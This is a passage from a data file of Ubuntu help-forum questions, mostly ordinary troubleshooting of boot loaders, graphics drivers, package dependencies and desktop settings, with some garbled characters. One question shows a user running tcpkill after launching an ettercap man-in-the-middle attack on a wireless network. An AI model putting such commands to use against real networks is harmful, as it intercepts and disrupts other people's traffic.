stack = ' '' @ /usr/share/gnome-shell/js/misc/gnomesession.js:24 '' ' js error : ! ! ! message = ' '' gio.dbusproxy.makeproxywrapper is not a function '' ' js error : ! ! ! exception was : typeerror : gio.dbusproxy.makeproxywrapper is not a function js error : ! ! ! linenumber = '24' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/misc/gnomesession.js '' ' js error : ! ! ! stack = ' '' @ /usr/share/gnome-shell/js/misc/gnomesession.js:24 '' ' js error : ! ! ! message = ' '' gio.dbusproxy.makeproxywrapper is not a function '' ' js error : ! ! ! exception was : typeerror : gio.dbusproxy.makeproxywrapper is not a function js error : ! ! ! linenumber = '24' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/misc/gnomesession.js '' ' js error : ! ! ! stack = ' '' @ /usr/share/gnome-shell/js/misc/gnomesession.js:24 '' ' js error : ! ! ! message = ' '' gio.dbusproxy.makeproxywrapper is not a function '' ' js error : ! ! ! exception was : typeerror : gio.dbusproxy.makeproxywrapper is not a function js error : ! ! ! linenumber = '24' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/misc/gnomesession.js '' ' js error : ! ! ! stack = ' '' @ /usr/share/gnome-shell/js/misc/gnomesession.js:24 '' ' js error : ! ! ! message = ' '' gio.dbusproxy.makeproxywrapper is not a function '' ' window manager warning : log level 32 : execution of main.js threw exception : typeerror : gio.dbusproxy.makeproxywrapper is not a fun any ideas ? i 'm plum out of gas to keep tackling this and found myself considering migrating this workstation to windows after 4+ years of freedom ... video : nvidia gt 520 cpu : amd phenom ii ( dual core ) 3.2ghz ram : 12gb ddr3 additional note 2 monitors are working properly , and i can boot into unity 2d booting into gnome 3 loads a desktop where hotkeys work and all startup programs load but no gnome-shell which errors out when trying to run via console unity simply loads to the desktop where it is then non-responsive for a couple minutes and times out back to lightdm ( more log pastes shortly )
167313	whats the matter with system loads ?	look at the image for what i am tying to ask . whats parameters of load averages and how we have to understand them ?
167314	how to change keyboard shortcut for compiz magnifier ( currently alt-enter )	i 'm running ubuntu 12.04 with unity3d . when i press alt+enter ( a keyboard shortcut used by a number of things , especially sublime text ) , the compiz magnifier is launched ( creating a box around the cursor , and zooming the contents of the box ) . i tried to change the keyboard shortcut in compizconfig settings manager ( the `` magnifier '' effect ) . i changed it to ctrl+alt+space , which is working for me . however , alt+enter still triggers the effect . if i disable the effect , it stops . so i know it is the magnifier effect . i just ca n't figure out why alt+enter is still triggering the effect even after changing the shortcut .
167317	ubuntu 12.04 wo n't boot from gigaware usb	i installed ubuntu to my 4gb gigaware usb fat32 using unetbootin on windows 7 . than when i rebooted it went to a black screen that shows syslinux copyright . any help please ? thanks .
167321	double boot choice	i am keeping in my system both windows 7 and ubuntu 12.04 . initially i had grub2 as boot loader . afterward i swapped back to the windows boot-loader , adding an entry for linux through easybcd . now , when i start the computer , the windows boot loader asks for a choice between windows and linux . after having selected linux , the previous grub2 loader comes in asking which system i would like to start . so is there a way to avoid that grub2 prompts again which system to boot , automatically loading linux ?
167324	how to install ganglia 3.4.0 in 11.10 ?	i am new to this environment . i am trying to install ganglia-monitor-core3.4.0 in ubuntu 11.10 . but i am getting a error code 1 while executing the configure commands . can i do the installation from the root user ? because in an installation guide that i 've found , the prompt of terminal started with % , where as for root user it displays # in the terminal . if you come across any installation materials or tutorials please let me know asap .
167325	pcap compile syntax error on ubuntu 10.10	when i try to run the command sudo tcpkill -i wlan0 -9 example.com it says pcap_compile : syntax error tcpkill : could n't initialize sniffing i am running ettercap to initialize mitm btw i 'm running this on a dell inspiron 14r n4010 .
167327	ubuntu 12.04 lts install problem , stuck/crash at loading screen	whenever i try to boot using the iso from the website , it brings up the loading screen , where it promptly takes 3-5 minutes , and then either a ) crashes to an artifact screen ( blue/green pixels everywhere , light grey boxes ) or b ) crashes to a console screen wherein it brings up a bunch of gibberish of starting and stopping a bunch of processes ( what i assumed to be what goes on behind the loading screen ? ) . this has happened to me using both the 64-bit and 32-bit versions from ubuntu 's website . i also tried wubi but it just got stuck at the loading screen for the 15 minutes i let it run . this is all in an attempt to dual boot windows 7 64-bit and ubuntu 12.04 lts . my laptop is an asus with a core i5 at 3ghz , nvidia 350m , 4gb ram , 500gb hdd . any help appreciated ! thanks folks !
167340	why does du show that an 83gb file uses zero space ?	in home/ { user } , i have a file called ntfs.txt whose total size of files is 83,3gb and whose size on disk is 0b . its owned and group are both root . the last time it was accessed is the 24/07/2012 . ls -l /home/romain/ntfs.txt outputs -rw -- -- -- - 1 root root 83346727424 janv . 15 2012 /home/ { user } /ntfs.txt and du /home/romain/ntfs.txt gives 0 /home/ { user } /ntfs.txt . previously , i had a wubi install which i moved to a separated partition later . i also just got rid of windows , but the file is still here . what 's with its strange size ? can i delete it ?
167343	what is a `` asking for cache data failed '' warning ?	i 'm installing ubuntu server 12.04 on dell laptop and i frequently get an message as below : 3256.362200 ] sd 5:0:0:0 : [ sdb ] asking for cache data failed [ 3256.362200 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through what does this message means and how can it be removed ?
167346	cardbus sound card not auto-detected	i 'm running 12.04 and i have a creative x-fi `` cardbus '' sound card . it works fine if i boot the computer with the card already inserted ; but if i insert it after boot , it is not detected . also dmesg shows absolutely nothing after inserting the card . it was working on ubuntu 11.04 . is there anything i can do to make it auto-detect again ? failing that , any command i could issue to manually make the computer detect it without having to reboot ? thanks , cristian update : i tried to add `` pcie_aspm=force '' to the boot options ( someone told me it might help ) but nothing changed .
167353	missing /dev/shm	when i tried opening google-chrome in ubuntu 12.04 lts , i received the following error : [ 1976:2032:299999600 : error : shared_memory_posix.cc ( 171 ) ] creating shared memory in /dev/shm/.com.google.chrome.0apmlo failed : no such file or directory [ 1976:2032:299999742 : error : shared_memory_posix.cc ( 174 ) ] unable to access ( w_ok|x_ok ) /dev/shm : no such file or directory [ 1976:2032:299999773 : fatal : shared_memory_posix.cc ( 176 ) ] this is frequently caused by incorrect permissions on /dev/shm . try 'sudo chmod 1777 /dev/shm ' to fix . however , when i tried sudo chmod 1777 /dev/shm , i discovered that /dev/shm did not in fact exist . i do n't know what happened , and how to fix this ?
167360	how to format the ffmpeg command to record sound from my webcam	using ffmpeg arecord -l , i am able to identify my logitech usb webcam as : hw : card=u0x46d0x821 , dev=0 usb device 0x46d:0x821 , usb audio direct hardware device without any conversions plughw : card=u0x46d0x821 , dev=0 usb device 0x46d:0x821 , usb audio hardware device with all software conversions when i go into /dev/snd/by-id , the webcam is described as : usb-046d_0821_6813bfd0-00 - > ../controlc1 i know that the command to use a sound device in ffmpeg is ffmpeg -f alsa -i $ alsa_device_name.. i have tried ffmpeg -f alsa -i `` hw : card=u0x46d0x821 , dev=0 '' and ffmpeg -f alsa -i `` plughw : card=u0x46d0x821 , dev=0 '' and in both cases i receive the same error message alsa lib pcm.c:2208 : ( snd_pcm_open_noupdate ) unknown pcm hw=card=u0x46d0x821 , dev=0 [ alsa @ 0x9c96580 ] can not open audio device hw=card=u0x46d0x821 , dev=0 ( no such file or directory ) hw : card=u0x46d0x821 , dev=0 : input/output error i have also tried ffmpeg -f alsa -i `` usb-046d_0821_6813bfd0-00 '' and ffmpeg -f alsa -i `` usb-046d_0821_6813bfd0-00 , dev=0 '' and have still received error message could use some help in formulating the correct format of the command
167366	msxml 6.0 for wine	i have trying to install an application to ubuntu 12.04 via winetrics . however , i have got below error . this msxml 6.0 is not supported on the current processor type i have searched google to fix this error , but i could nor manage it . thus , how can i fix it ?
167367	why my upstart script do n't work ?	it is strange the script use to work fine , but after the proxy went down for a while , it do n't work all the time . but the command in script section can still do it 's job , and i have no idea what 's going on . description `` secure gate through '' # no start option as you might not want it to auto-start # this might not be supported - you might need a : start on runlevel [ 3 ] stop on runlevel [ ! 2345 ] # if you want it to automatically restart if it crashes , leave the next line in respawn script plink -v -n proxy @ 12.34.96.48 -d 127.0.0.1:8580 -pw **** end script after start , i can see plink in ps -a , but the forwarding do n't work at all .
167368	does boot repair really work ?	i installed xubuntu 10.04 on a 3-year-old nec laptop , and it wo n't boot . boot repair says it 's okay , but it 's not . here 's the link to the bootinfoscript output
167369	why ca n't i connect to xmlrpc.launchpad.net ?	i tried to check out the source code of opencog ( cogbuntu ) using bazaar using the commands they had mentioned in their wiki . this is the code entered in the terminal bzr branch -r40 lp : cogbuntu cogbuntu-11.10 this is the error i got error : connection error : while sending connect xmlrpc.launchpad.net:443 : [ errno 113 ] no route to host can anyone explain how to make this thing work ?
167370	is it possible to get drakconf in ubuntu ?	i am using pclos for a long time , but now considering to switch to kubuntu due some unsolved issues in this distro and also because of much bigger applications choice in repositories . however , essential issue for me is to have the drakconf tools ( also called mandriva/mageia/pclinuxos control center ) - some info is here . i already tried many different distros but found nothing able tu fully replace this excellent and complex tool . is there any possibility to get this also in ubuntu ? thanks ps : i think that at least beginner users would appreciate it too .
167373	sanskrit fonts and half letters	i have been able to access sanskrit fonts . how do i type half letters to get compound letters in sanskrit ?
167374	reinstall ubuntu wit uefi for better performance ?	i am thinking about reinstalling ubuntu 12.04 on a freshly formatted disk with bios changed to uefi on my asus laptop . i hope , it can boost my bootup performance , but am not sure whether it is worth the effort . what do you think ?
167375	where can i find binaries of xscreensavers for ubuntu 12.04 lts	i am trying to find out where i can find binaries or deb xscreensaver packages to download for my ubuntu 12.04 lts system ?
167376	how to manage service relations in juju at fine grained unit level ?	my service recipe : db server < - > app server < - > web reverse proxy . my relation requirements are : 1 unit of db server related 1 ( specific ) unit of app server 1 unit of web reverse proxy related to all app servers given below is a sequence of juju commands , that will happen in my case expected steps are ( correct me if i am wrong ) : phase - install deploy db deploy app server deploy web reverse proxy add relation app server to db add relation web reverse proxy to app server phase - scaling add unit db add unit app server ( problem step ) : oh no ! i do n't need the automatic behavior based on provides/required setting in charm metadata . i want to specify the app server to db relation at a unit level here . ideally , i want the relation-xxx hooks to fire only on the new unit of db . may be an add-unit parameter passing mechanism similar to one proposed for deploy ? my thoughts for a work around given the current features are as following : one way is to conditional execute in callbacks . check if already related to a remote unit and ignore the incoming relation-added/changed call back . would be messy . when restarting services may be buggy cause of sequence of start for each db app unit pair has to be carefully managed or wrong app service will talk to wrong db service . i am already using juju as a back-end service with a python script managing the juju cli . another way is that i have a specific code which is common to the app server / db pair . much like the set command for post deploy phase , can i use it to set values to specific service instances post add-unit ? another option is a subordinate service with a container scope - but i want db as a separate machine instance not on the app server machine instance.. as for the web proxy , i expect the hooks to be fired , so proxy can add the new app server as a back-end . current juju behavior is ideal . i am looking forwards to a optimal way to go about this . thanks in advance..
167378	anyone else experiencing this problem : firefox menus reliably stop working whenever i open a web page from the hud	firefox is 14.01 , ubuntu is 12.04 latest updates . unity 3d . regardless of what i 'm doing in firefox menus will stop working if i open a web page from the hud . if i run firefox normally everything works normal , if i then open a link , say from the ask ubuntu lens , i 'll be allowed to open one menu one time , after that all dropdowns ( of any kind , also url bar searches ) are gone . this also happens in safemode so addons should not be an issue .
167388	are intel hd 4000 graphics supported on ubuntu 10.04 lts ?	i have an intel core i7-3700 system with intel hd 4000 integrated graphics with a dual monitor setup ( 1 connected via vga , the other via dvi ) on ubuntu 10.04 lts 64bit . i 'm trying to get my monitors correctly detected . right now , in only 1 unknown monitor is detected with a max resolution of 1280x1024 , which is lower than my main monitor connected to dvi . also , the desktop is mirrored rather than extended . i 've previously managed to get a core i5-2400 system with intel hd 3000 integrated graphics with the same dual monitor setup and ubuntu 10.04 lts 64bit to work using the glasen ppa drivers , but this time , after installing them following the instructions how do i install the intel hd 3000 video driver ? but it does n't seem to work . does the intel hd 4000 require a different driver from the 3000 ? if so , where can i get it ?
167389	why do pages not load in any browser after updating ubuntu 12.04 ?	first thought its a network problem but it is n't everything is fine . my system is is fully updated , flash and java all up to date . just did a clean install of ubuntu 12.04 every thing was fine , updated my system from the update manager , restarted it then after that . now pages like facebook ( after log in ) , yahoo , picmonkey , hotmail etc do n't load at all and comments section and certain other parts of pages like aas , omgubuntu.com , makeuseof.com , etc keep on loading but do n't load . google search is loading as usual but results are not opening and pages keep loading . found a similar question here but didnt get any help why do all web browsers refuse to load hotmail after an update ?
167390	problem downloading rapidshare file ( url encoding )	i installed plowshare knowing that it can download rapidshare files from terminal , but if there are any parentheses ( ) 窶覚r brackets [ ] in the link then it ca n't download the link . can this problem be solved by any means ? i mean by editing the configuration file or something ?
167394	sound card selection	i 'm looking for a way to select sound card in lubuntu 12.04 without installing any additional packages like xfce4-mixer ( with all of its dependencies ) . is there a way to interactively select a sound card with alsa ?
167402	ca n't detect my graphics card ( nvidia gt 620m ) on xubuntu 11.10 & 12.04	the title pretty much sums it up . i recently purchased a new laptop with a nvidia gt 620m , in order to use cuda . i also have an intel integrated graphics card . i first proceeded to install the developer drivers as i 'm accustomed to , and tested the setup with a cudagetdevicecount - which returned 0 . a quick glance at lspci also gave this : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 3d controller : nvidia corporation device 1140 ( rev a1 ) 02:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) which confirmed that linux does not detect the graphics card ( while windows does ) . overall , i attempted installing the following drivers : the cuda developer ones ( 295.41 ) and the 295.59 ones either manually or using a package from a repository ( namely ppa : ubuntu-x-swat/x-updates and ppa : upubuntu-com/nvidia ) i also tried reinstalling xubuntu 11.10 aswell as the above drivers , in vain . browsing through other related threads did n't help much either . would any of you kind sirs help me out of this predicament ? thank you .
167405	changing brightness in unity settings results in dead samsung 300e5z-s08	i experienced the following problem when trying to change brightness either through the system settings of the shell , or by using fn + f2 fn+f3 combinations . the brightness bar appears in the top left corner of the screen and the whole system becomes non-responsive . trying to change the brightness with xrandr works without problems , though . the laptop uses an nvidia optimus card . the problem appears both with the nvidia-current driver installed and without it . is there any way to disable what causes this failure ? thank you for your help it almost works now . i can reduce the brightness with the buttons and through the shell , though i ca n't increase it back . in this path /sys/class/backlight i have two similar directories . one called samsung and one called intel_backlight . if i try to modify the values in the samsung i can not get more than 3 out of 8 . however if i modify the intel_backlight i can increase back to max .
167410	how to open shared folder in windows xp from nautilus	i have fresh installed ubuntu 12.04 , and want to connect with windows network . actually i want to open some shared folder in another pc ( windows xp ) . i 'm just need to open this window 's folder use nautilus not in terminal . after install smbfs , i do n't know how to do next .
167417	problem with gtk.image	i am having a problem with a gtk.image . i use the set_from_file ( ) function to add the image to the gtk.image but the image is not displayed ! instead the broken icon is ... the image exist and i can open it with the default image viewer so its not corrupted.. i tried with pixbuf also but i get the same result.. any idea why the image appears corrupted and how to fix it ?
167419	switching workspaces in xfce issue ?	i disabled the applet for desktop workspaces in my xfce panel ( well i actually removed the panel all together ) , but now xfce seems to think my 4 workspaces are side-by-side and not splayed out , so the shortcut ctrl-alt-'up arrow ' and ctrl-alt-'down arrow ' do n't work but the left and right arrow ones do . any idea how to fix this without re-enabling the panel ? i prefer using the cairo-dock as a panel substitute for those who demand a reason .
167422	network interfaces missing for virtualbox host in 12.04	i had vmware player installed but decided to replace it with virtualbox . i installed it from aptitude normally : apt-get install virtualbox-ose everything went fine and it was able to build/insert kernel modules . i verified this by : lsmod | grep vbox with the output : vboxpci 23200 0 vboxnetadp 13382 0 vboxnetflt 23441 0 vboxdrv 287082 4 vboxpci , vboxnetadp , vboxnetflt however , there was something weird in the installation , i got : * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] i can normally create and start guest machines . however , the problem is that the virtual network interface that is created by virtual box is not shown when issuing : ifconfig as a result i ca n't connect to the guest from ssh or http or even ping . note : guest network mode is nat and it is bound to a dhcp ip 10.0.2.15 from dchp server 10.0.2.2 ! what am i missing here ?
167426	kate crashes while clicking open	i am running on ubuntu 12.04 i recently noticed that kate 4.8.4 which have been installed in my 64-bit pc is crashing whenever i try to open a file in it . it shows no problem when i open files via terminal . it displays the following in the terminal while crashing . trying to create local folder /home/myusername/.kde/tmp-mypcname : permission denied trying to create local folder /home/myusername/.kde/socket-mypcname : permission denied trying to create local folder /home/myusername/.kde/tmp-mypcname : permission denied qfile : :remove : empty or null file name kdeinit4 : aborting . bind ( ) failed : permission denied could not bind to socket '/home/myusername/.kde/socket-mypcname/kdeinit4__0' trying to create local folder /home/myusername/.kde/cache-mypcname : permission denied trying to create local folder /home/myusername/.kde/share : permission denied kate ( 3237 ) filemodule : failed to load configured file module `` kfilemodule '' kcrash : application 'kate ' crashing ... kcrash : attempting to start /usr/lib/kde4/libexec/drkonqi from kdeinit sock_file=/home/myusername/.kde/socket-mypcname/kdeinit4__0 warning : connect ( ) failed : : permission denied kcrash : attempting to start /usr/lib/kde4/libexec/drkonqi directly trying to create local folder /home/myusername/.kde/cache-mypcname : permission denied qfile : :remove : empty or null file name drkonqi ( 3251 ) /kshareddatacache kshareddatacache : :private : :mapsharedmemory : failed to establish shared memory mapping , will fallback to private memory -- memory usage will increase from the above i understand that this is a problem of user privileges . i checked running kate from the terminal as root it works fine . as i am new to linux can someone point me in a direction that could solve the problem .
167428	embed terminal on desktop in gnome 3.4	i 'm wondering if it is possible to embed the terminal on the desktop under gnome 3 . 4 . i would like it to be fully transparent , without any borders or shadows , basically to display just the text , even without the menu ! now before i get a comment to search the forums for an answer , i would like to add : the screenlet terminal does not work for me and is not what i want i do not use ccsm , do n't even know if it is possible under gnome 3 devilspie does not work ( it makes all my menus and borders from all my windows dissapear , and yes i followed instructions on how to make it happen so before saying to me that i should use the search function , think about what i am asking . my biggest problem is that all options that i tried do not work under gnome 3 . so if anyone knows for a solution , or explanation as to why not-
167429	what do i do when i see this in terminal ? please refer to picture in description	well , i have been using the apt-get install command to download multiple piees of software because i 'm too lazy to do it any other way , but occasionally this window comes up and i have no idea what to do . as far i have scanned , the < ok > is n't even selectable ! here 's the picture : and you 've probably it 's microsoft 's eula , not ubuntu 's ... so what the hell is this ? any help is appreciated . so , what can i do ? thanks in advance ! m
167431	rabbitvcs does n't have right-click integration with the file manager	i have installed rabbitvcs with apt-get , but nothing appears when i right-click on a versioned folder . i 've tried logging out and even restarting . what am i missing ?
167434	what the different hardware temperatures listed in psensor , sensor viewer etc reffer to ?	i have installed psensor and see a list of temperatures , but listed as âtemperature 1â , 2 , 3 etc . i can only guess where the processor is : but who 's who for sure ? the same question stands for sensors viewer . i can also type sensors in terminal but i get no more than that acpi -t gives thermal 0 : ok , 65.0 degrees c thermal 1 : ok , 37.9 degrees c thermal 2 : ok , 56.0 degrees c thermal 3 : active , 71.0 degrees c considering psensor , i know for a fact that : - the temperature that varies most depending on the cpu use is temp1 and it is one of the two highest - the other high temperature is temp4 and it goes to the ceiling when using youtube/flash - temp2 is very stable at a medium level of 50-60 degrees celsius - temp3 is by far the lowest and most imobile so , i guess temp1 is the cpu temperature , and temp4 is the gpu temperature . temp2 and 3 must be the motherboard and the hdd . does anybody know for sure ?
167437	is it possible to put documents in the launcher ?	is it possible to put documents in the launcher and if yes , how ?
167438	how to save theme settings and restore it later ?	i have changed base theme and made also some modifications ( change fonts , sizes , icons sets etc ) i would like to save all and test some other themes and restore them back.i 'm using 12.04 . is this possible ?
167442	firefox crashes when hud is opened	every time i press alt from firefox to open the hud , firefox crashes . what do i have to do ?
167445	issues with alternate windows software and wine	i am running a non-popular windows software with playonlinux and numerical fields like currency/monetary has an error with duplicated decimal separators . numbers are displayed as follows ( with brazilian locale ) : ,200,00 and , if i change ubuntu 's locale settings ( to us locale , for example ) : .200.00 my question is : how can i solve this problem ? or where can i ask this question if askubuntu is n't the right place ?
167457	is it required to update ubuntu every day or week ?	why do we need to update every day or week . every week 150mb of update ? this is similar to windows ( sorry i do not want to blame any one ) . i believe updates are to cater some loop holes , deficiency ; does this means that the software was released before full testing ?
167458	minecraft turn off pc on 11.04	i had install ubuntu 11.04 on two pc . on one everything work perfect , but another after some time turn off computer . i tried a lot of ideas ( reinstall , openjdk 7 ( give just black screen ) , but all still as it was before . i hope on your help ! please ! about pc ( i do n't remember all ) : amd 5500 ; nvidia ( maybe ) zotac gt 450 ( 512m ) ram 2 gb and one more ask will instalation sun jdk steal the trobel 's ?
167459	how to make windows the default os in grub menu ?	i have windows 7 on my laptop and i decided to install ubuntu as well . i successfully installed the new os but my boot menu has changed . i use windows 7 for my work , so i need that to be the default os . the menu is set up so that at startup the computer chooses linux as default os . how can i change that so windows 7 is the default os at boot up ?
167464	problem with package dependencies in qt4 library	i 'm having a problem with dependencies in the qt4 library , and i 'm not able to install anything via the apt-get command . apt-get update gives me a normal output . apt-get clean and apt-get autoclean do the same . apt-get-install -f gives the following output : dpkg : errore nell'elaborare libqt4-xmlpatterns : i386 ( -- configure ) : libqt4-xmlpatterns : i386 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-xmlpatterns : amd64 is in a different version ( 4:4.8.1-0ubuntu4.2 ) dpkg : errore nell'elaborare libqt4-xmlpatterns ( -- configure ) : libqt4-xmlpatterns : amd64 4:4.8.1-0ubuntu4.2 can not be configured because libqt4-xmlpatterns : i386 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-declarative : i386 : libqt4-declarative : i386 dipende da libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) , ma : la versione di libqt4-xmlpatterns : i386 nel sistema è 4:4.8.1-0ubuntu4.1 . dpkg : errore nell'elaborare libqt4-declarative : i386 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-declarative : libqt4-declarative dipende da libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqt4-xmlpatterns non è ancora configurato . dpkg : errore nell'elaborare libqt4-declarative ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqtgui4 : i386 : libqtgui4 : i386 dipende da libqt4-declarative ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqt4-declarative : i386 non è ancora configurato . dpkg : errore nell'elaborare libqtgui4 : i386 ( -- configure ) : problemi con lesegnalazione apport non scritta poiché il messaggio di errore indica la presenza di un fallimento precedente . segnalazione apport non scritta poiché il messaggio di errore indica la presenza di un fallimento precedente . segnalazione apport non scritta poiché è stato raggiunto il valore massimo di maxreports segnalazione apport non scritta poiché è stato raggiunto il valore massimo di maxreports segnalazione apport non scritta poiché è stato raggiunto il valore massimo di maxreports segnalazione apport non scritta poiché è stato raggiunto il valore massimo di maxreports dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqtgui4 : libqtgui4 dipende da libqt4-declarative ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqt4-declarative non è ancora configurato . dpkg : errore nell'elaborare libqtgui4 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-designer : libqt4-designer dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 non è ancora configurato . dpkg : errore nell'elaborare libqt4-designer ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-designer : i386 : libqt4-designer : i386 dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 : i386 non è ancora configurato . dpkg : errore nell'elaborare libqt4-designer : i386 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-help : libqt4-help dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 non è ancora configurato . dpkg : errore nell'elaborare libqt4-help ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-opengl : libqt4-opengl dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 non è ancora configurato . dpkg : errore nell'elaborare libqt4-opengl ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-opengl : i386 : libqt4-opengl : i386 dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 : i386 non è ancora configurato . dpkg : errore nell'elaborare libqt4-opengl : i386 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-qt3support : i386 : libqt4-qt3support : i386 dipende da libqt4-designer ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqt4-designer : i386 non è ancora configurato . libqt4-qt3support : i386 dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 : i386 non è ancora configurato . dpkg : errore nell'elaborare libqt4-qt3support : i386 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-scripttools : libqt4-scripttools dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 non è ancora configurato . dpkg : errore nell'elaborare libqt4-scripttools ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-scripttools : i386 : libqt4-scripttools : i386 dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 : i386 non è ancora configurato . dpkg : errore nell'elaborare libqt4-scripttools : i386 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-svg : libqt4-svg dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 non è ancora configurato . dpkg : errore nell'elaborare libqt4-svg ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di libqt4-svg : i386 : libqt4-svg : i386 dipende da libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) , ma : il pacchetto libqtgui4 : i386 non è ancora configurato . dpkg : errore nell'elaborare libqt4-svg : i386 ( -- configure ) : problemi con le dipendenze - lasciato non configurato si sono verificati degli errori nell'elaborazione : libqt4-xmlpatterns : i386 libqt4-xmlpatterns libqt4-declarative : i386 libqt4-declarative libqtgui4 : i386 libqtgui4 libqt4-designer libqt4-designer : i386 libqt4-help libqt4-opengl libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-scripttools libqt4-scripttools : i386 libqt4-svg libqt4-svg : i386 i 've found this thread : canot resolve package dependencies but i was n't able to remove and reinstall all the packages with dpkg -r , because i kept getting problems with dependencies while removing . it seems to me that i have problems with the different versions for different architectures in libqt4-xmlpatterns : errore nell'elaborare libqt4-xmlpatterns : i386 ( -- configure ) : libqt4-xmlpatterns : i386 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-xmlpatterns : amd64 is in a different version ( 4:4.8.1-0ubuntu4.2 ) dpkg : errore nell'elaborare libqt4-xmlpatterns ( -- configure ) : libqt4-xmlpatterns : amd64 4:4.8.1-0ubuntu4.2 can not be configured because libqt4-xmlpatterns : i386 is in a different version ( 4:4.8.1-0ubuntu4.1 ) in var/lib/dpkg/status i have the following about this package : package : libqt4-xmlpatterns status : deinstall ok unpacked multi-arch : same priority : optional section : libs installed-size : 4543 maintainer : kubuntu developers < kubuntu-devel @ lists.ubuntu.com > architecture : amd64 source : qt4-x11 version : 4:4.8.1-0ubuntu4.2 config-version : 4:4.8.1-0ubuntu4.1 depends : libc6 ( > = 2.14 ) , libgcc1 ( > = 1:4.1.1 ) , libqt4-network ( = 4:4.8.1-0ubuntu4.2 ) , libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) , libstdc++6 ( > = 4.1.1 ) pre-depends : multiarch-support description : qt 4 xml patterns module qt is a cross-platform c++ application framework . qt 's primary feature is its rich set of widgets that provide standard gui functionality . . qtxmlpatterns is a xquery and xpath engine for xml and custom data models . homepage : http : //qt.nokia.com/ original-maintainer : debian qt/kde maintainers < debian-qt-kde @ lists.debian.org > package : libqt4-xmlpatterns status : deinstall ok half-configured multi-arch : same priority : optional section : libs installed-size : 4257 maintainer : kubuntu developers < kubuntu-devel @ lists.ubuntu.com > architecture : i386 source : qt4-x11 version : 4:4.8.1-0ubuntu4.1 config-version : 4:4.8.1-0ubuntu4.1 depends : libc6 ( > = 2.4 ) , libgcc1 ( > = 1:4.1.1 ) , libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) , libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) , libstdc++6 ( > = 4.1.1 ) pre-depends : multiarch-support description : qt 4 xml patterns module qt is a cross-platform c++ application framework . qt 's primary feature is its rich set of widgets that provide standard gui functionality . . qtxmlpatterns is a xquery and xpath engine for xml and custom data models . homepage : http : 